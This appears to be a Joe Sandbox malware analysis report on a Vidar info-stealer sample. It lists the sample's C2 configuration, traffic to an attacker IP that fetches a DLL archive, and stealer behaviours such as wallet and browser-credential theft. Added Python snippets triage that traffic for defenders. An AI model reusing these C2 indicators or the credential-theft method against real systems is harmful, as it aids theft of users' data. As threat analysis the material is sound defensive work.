Windows Analysis Report
pdf_novichki.rar

Overview

General Information

Sample Name: pdf_novichki.rar
Analysis ID: 829691
MD5: 214c47a7948ca5d3834c3f21cd1cc208
SHA1: 865f07f62dcf68c9929baf4890328e32d7f923fa
SHA256: 0a5e037e5954adb680c726089439539073993e2e1114a9ca9e6932e7dd702d9e

Detection

Vidar
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for dropped file
Drops PE files with a suspicious file extension
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

AV Detection

Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Avira: detection malicious, Label: WORM/Lodbak.Gen2
Source: 12.2.pdf4ik.scr.29d80000.1.unpack Malware Configuration Extractor: Vidar {"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D94697 lstrcatA,lstrcatA,lstrcatA,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcatA,lstrcatA,lstrcatA,KiUserExceptionDispatcher,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep, 12_2_29D94697
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D98FB0 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA, 12_2_29D98FB0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D991B0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 12_2_29D991B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D85010 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 12_2_29D85010
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D99210 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 12_2_29D99210
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D994A0 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, 12_2_29D994A0
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 12_2_29D9B960
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D93B60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_29DA4C40
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9CE80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D96160
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 12_2_29D90130
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9E060
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA, 12_2_29D8F3E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 12_2_29D9B520
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D964B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA, 12_2_29D9E470
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880

Networking

Source: Malware configuration extractor URLs: https://t.me/zaskullz
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199486572327
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 116.203.13.130
Source: global traffic HTTP traffic detected:
    GET /zaskullz HTTP/1.1
    X-Id: 14ac9d852bc10b98f94de36f839b2f59
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    X-Id: 14ac9d852bc10b98f94de36f839b2f59
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
    Host: 116.203.13.130
Source: global traffic HTTP traffic detected:
    GET /edit.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
    Host: 116.203.13.130
    Cache-Control: no-cache
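The extracted config lists two public profile pages as "C2 url", and the traffic above shows the sequence that implies: read t.me/zaskullz, then contact 116.203.13.130 directly, both requests carrying the same X-Id value, followed by the archive fetch. Three traits survive in the request lines alone: a Host that is a bare IP, a non-standard X-Id header, and User-Agent strings that are almost but not quite a real browser's (Gecko / 20100101 Firefox / 107.0 has spaces around the slashes; Edg/107.0.1418.26/8mqLqMuL-37 carries a trailing token). The Python below is an added example, not part of the Joe Sandbox report: it re-parses those three requests (reconstructed here with the header lines split back onto CRLF boundaries), flags each trait, and correlates the dead-drop fetch with the bare-IP contact through the shared X-Id. DEAD_DROP_HOSTS, the reason strings and the two reference User-Agent patterns are the example's own choices.

```python
from __future__ import annotations

import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed from the three requests recorded in the report above, with the run-together
# header lines restored to CRLF boundaries. Nothing in this example touches the network.
CAPTURED_REQUESTS = [
    "GET /zaskullz HTTP/1.1\r\n"
    "X-Id: 14ac9d852bc10b98f94de36f839b2f59\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0\r\n"
    "Host: t.me\r\n\r\n",
    "GET / HTTP/1.1\r\n"
    "X-Id: 14ac9d852bc10b98f94de36f839b2f59\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37\r\n"
    "Host: 116.203.13.130\r\n\r\n",
    "GET /edit.zip HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37\r\n"
    "Host: 116.203.13.130\r\n"
    "Cache-Control: no-cache\r\n\r\n",
]

# Public pages this family reads to learn its real C2 (the "C2 url" values in the extracted
# config). The set is this example's choice; extend it from your own config extractions.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}

# Shape of a genuine Firefox and Edge (Chromium) User-Agent. Both captured strings deviate:
# "Gecko / 20100101 Firefox / 107.0" has spaces around the slashes, and the Edge string carries
# an extra "/8mqLqMuL-37" token after the version, so neither pattern matches them.
FIREFOX_UA = re.compile(r"^Mozilla/5\.0 \([^)]*; rv:(\d+)\.0\) Gecko/20100101 Firefox/\1\.0$")
EDGE_UA = re.compile(
    r"^Mozilla/5\.0 \([^)]*\) AppleWebKit/537\.36 \(KHTML, like Gecko\) "
    r"Chrome/\d+(?:\.\d+){3} Safari/537\.36 Edg/\d+(?:\.\d+){3}$"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, version and a lower-cased header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")  # first colon only; values such as rv:107.0 contain ':'
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IPv4 literal (optionally with :port) rather than a name."""
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def flag_request(req: dict) -> list[str]:
    """Return the reasons one request looks like stealer traffic (empty list when none apply)."""
    h = req["headers"]
    host, ua = h.get("host", ""), h.get("user-agent", "")
    reasons = []
    if host in DEAD_DROP_HOSTS:
        reasons.append("dead-drop host")
    if is_bare_ip(host):
        reasons.append("bare-IP host")
    if "x-id" in h:
        reasons.append("non-standard X-Id header")
    if "Firefox" in ua and not FIREFOX_UA.match(ua):
        reasons.append("malformed Firefox UA")
    if "Edg/" in ua and not EDGE_UA.match(ua):
        reasons.append("malformed Edge UA")
    return reasons


def correlate(requests: list[dict]) -> dict[str, list[str]]:
    """Group requests by X-Id and keep the ids that touched both a dead-drop host and a bare IP:
    that pairing is the resolver step (read the public page) followed by the real C2 contact."""
    hosts_by_id: dict[str, set[str]] = defaultdict(set)
    for req in requests:
        xid = req["headers"].get("x-id")
        if xid:
            hosts_by_id[xid].add(req["headers"].get("host", ""))
    return {
        xid: sorted(hosts)
        for xid, hosts in hosts_by_id.items()
        if hosts & DEAD_DROP_HOSTS and any(is_bare_ip(h) for h in hosts)
    }


def triage(raw_requests: list[str]) -> dict:
    """Run both checks over a capture and return a summary keyed like the report's own lines."""
    reqs = [parse_request(r) for r in raw_requests]
    return {
        "per_request": [(f"{r['method']} {r['headers'].get('host', '?')}{r['path']}", flag_request(r))
                        for r in reqs],
        "dead_drop_pairs": correlate(reqs),
    }


if __name__ == "__main__":
    result = triage(CAPTURED_REQUESTS)
    for line, reasons in result["per_request"]:
        print(line, "->", ", ".join(reasons) or "clean")
    print(result["dead_drop_pairs"])
```

On a proxy or IDS log the same correlation would run per source host rather than per X-Id, since most traffic carries no such header. The JA3 value 37f463bf4616ecd445d4a1937da06e19 recorded in this section is an independent pivot for the TLS leg to t.me that a request-level check like this one does not see.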
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 18 Mar 2023 20:39:15 GMT
    Content-Type: application/zip
    Content-Length: 2685679
    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
    Connection: keep-alive
    ETag: "631f30d3-28faef"
    Accept-Ranges: bytes
    Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 
13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
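The 200 OK above returns 2,685,679 bytes of application/zip, and the start of the body is enough to identify what was fetched: 50 4b 03 04 is the ZIP local-file-header signature and the 11 bytes 66 72 65 65 62 6c 33 2e 64 6c 6c spell freebl3.dll, one of the Mozilla NSS libraries that info-stealers download so they can call NSS to decrypt Firefox login data. The Python below is an added example, not part of the Joe Sandbox report: it parses that header from the first 41 bytes of the captured dump, so the entry can be identified from a truncated capture, and it also reports the encryption and data-descriptor flag bits that a more hostile archive might set (both are clear in this sample).

```python
import struct
from datetime import datetime

# The first 41 bytes of the "Data Raw" dump in the captured HTTP/1.1 200 response to
# GET /edit.zip, copied from the report above; the bytes after these are deflate stream data.
RESPONSE_PREFIX = bytes.fromhex(
    "50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 "
    "50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c"
)

LOCAL_HEADER_SIG = b"PK\x03\x04"
# Fixed 30-byte part of the local file header (APPNOTE section 4.3.7), little-endian:
# signature, version needed, flags, method, mod time, mod date, crc32,
# compressed size, uncompressed size, file name length, extra field length.
LOCAL_HEADER_FMT = "<4sHHHHHIIIHH"
LOCAL_HEADER_LEN = struct.calcsize(LOCAL_HEADER_FMT)  # 30
METHOD_NAMES = {0: "stored", 8: "deflate", 12: "bzip2", 14: "lzma", 93: "zstd", 99: "aes"}


def dos_datetime(dos_time: int, dos_date: int) -> datetime:
    """Decode the packed MS-DOS date/time fields ZIP inherits from FAT (2-second resolution)."""
    return datetime(
        1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
        dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
    )


def parse_local_file_header(data: bytes) -> dict:
    """Parse the ZIP local file header at the start of `data`.

    Works on a truncated capture: only the fixed header plus the file name are needed,
    so the compressed data and any later entries may be absent.
    """
    if len(data) < LOCAL_HEADER_LEN:
        raise ValueError("buffer shorter than a ZIP local file header")
    (sig, version, flags, method, mtime, mdate, crc,
     csize, usize, name_len, extra_len) = struct.unpack_from(LOCAL_HEADER_FMT, data, 0)
    if sig != LOCAL_HEADER_SIG:
        raise ValueError(f"not a ZIP local file header, got {sig!r}")
    name_end = LOCAL_HEADER_LEN + name_len
    if len(data) < name_end:
        raise ValueError("capture ends inside the file name field")
    # General purpose bit 11 marks a UTF-8 name; otherwise the name is IBM437 (APPNOTE appendix D).
    name = data[LOCAL_HEADER_LEN:name_end].decode("utf-8" if flags & 0x800 else "cp437")
    return {
        "name": name,
        "version_needed": version,
        "encrypted": bool(flags & 0x1),                  # bit 0: entry is encrypted
        "sizes_in_data_descriptor": bool(flags & 0x8),   # bit 3: crc/sizes here are zero, real ones follow the data
        "method": method,
        "method_name": METHOD_NAMES.get(method, f"unknown({method})"),
        "crc32": f"{crc:08x}",
        "compressed_size": csize,
        "uncompressed_size": usize,
        "modified": dos_datetime(mtime, mdate),
        "data_offset": name_end + extra_len,             # where the compressed bytes begin
    }


def summarize(data: bytes) -> str:
    """One-line triage string for an analyst note."""
    h = parse_local_file_header(data)
    return (f"{h['name']} ({h['method_name']}, {h['compressed_size']} -> {h['uncompressed_size']} bytes, "
            f"crc32 {h['crc32']}, modified {h['modified']:%Y-%m-%d %H:%M:%S})")


if __name__ == "__main__":
    print(summarize(RESPONSE_PREFIX))
```

The entry's DOS timestamp (2022-09-05 10:49:08) is a week older than the response's Last-Modified (12 Sep 2022), which fits an archive rebuilt after the DLL was packaged, and the 359,481-byte compressed size is far below Content-Length, so further entries follow this one in the body.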
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95 (5 events)
Source: unknown TCP traffic detected without corresponding DNS query: 20.224.151.203 (2 events)
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.88.191 (2 events)
Source: unknown TCP traffic detected without corresponding DNS query: 116.203.13.130 (41 events)
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130
Source: pdf4ik.scr, 0000000C.00000002.2416733096.0000000001616000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip9
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zip:D
Source: pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipvqD
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/edit.zipx
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130/oI
Source: pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.203.13.130z
Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://135.181.87.234:80
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.0000000001621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
